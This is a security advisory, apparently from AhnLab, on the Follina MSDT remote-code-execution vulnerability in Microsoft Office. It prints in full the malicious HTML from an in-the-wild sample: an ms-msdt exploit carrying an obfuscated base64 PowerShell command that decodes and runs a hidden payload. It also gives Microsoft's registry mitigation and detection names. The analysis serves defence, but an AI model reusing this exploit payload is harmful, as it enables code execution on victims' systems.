A new vulnerability named Follina (CVE-2022-30190) has been revealed. According to Microsoft, it is a remote code execution vulnerability that occurs when the URL protocol is used to call MSDT in calling applications such as Microsoft Word. With the privileges of the calling application, attackers can run arbitrary codes, install additional programs, and view, change or delete data.
1. Vulnerability Malware Example
The vulnerability occurs when a Word file downloads and runs an HTML file responsible for the vulnerability through the URL connection written in the external tag, a method that has been previously known (as the URL is currently invalid, additional operations do not work). As soon as the Word file with the vulnerability is opened, it accesses the URL and calls the MSDT of the downloaded HTML to execute malicious codes.
The details of above RDF8421.html file shares the same code shown below and has a code that executes ms-msdt. By running ms-msdt, various attacks can be made possible according to the attacker’s intention.
<!doctype html> <html lang="en"> <body> <script> //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -- omitted -- //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JGNtZCA9ICJjOlx3aW5kb3dzXHN5c3RlbTMyXGNtZC5leGUiO1N0YXJ0LVByb2Nlc3MgJGNtZCAtd2luZG93c3R5bGUgaGlkZGVuIC1Bcmd1bWVudExpc3QgIi9jIHRhc2traWxsIC9mIC9pbSBtc2R0LmV4ZSI7U3RhcnQtUHJvY2VzcyAkY21kIC13aW5kb3dzdHlsZSBoaWRkZW4gLUFyZ3VtZW50TGlzdCAiL2MgY2QgQzpcdXNlcnNccHVibGljXCYmZm9yIC9yICV0ZW1wJSAlaSBpbiAoMDUtMjAyMi0wNDM4LnJhcikgZG8gY29weSAlaSAxLnJhciAveSYmZmluZHN0ciBUVk5EUmdBQUFBIDEucmFyPjEudCYmY2VydHV0aWwgLWRlY29kZSAxLnQgMS5jICYmZXhwYW5kIDEuYyAtRjoqIC4mJnJnYi5leGUiOw=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\""; </script> </body> </html>
2. Response to Vulnerability
Microsoft posted the following response for the vulnerability.
- Disabling the MSDT URL protocol
1. Run command prompt (cmd.exe) as administrator
2. Execute “reg export HKEY_CLASSES_ROOT\ms-msdt filename” to back up the registry key
3. Execute the command “reg delete HKEY_CLASSES_ROOT\ms-msdt\f”
3. AhnLab Products Response Status
AhnLab can detect the vulnerable file and its behaviors with the following aliases:
- (File alias) Exploit/HTML.CVE-2022-30190.S1841
- (Behavior alias) Behavior/MDP.Event.M4313
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
Reference 1. https://www.huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug
Reference 2. https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/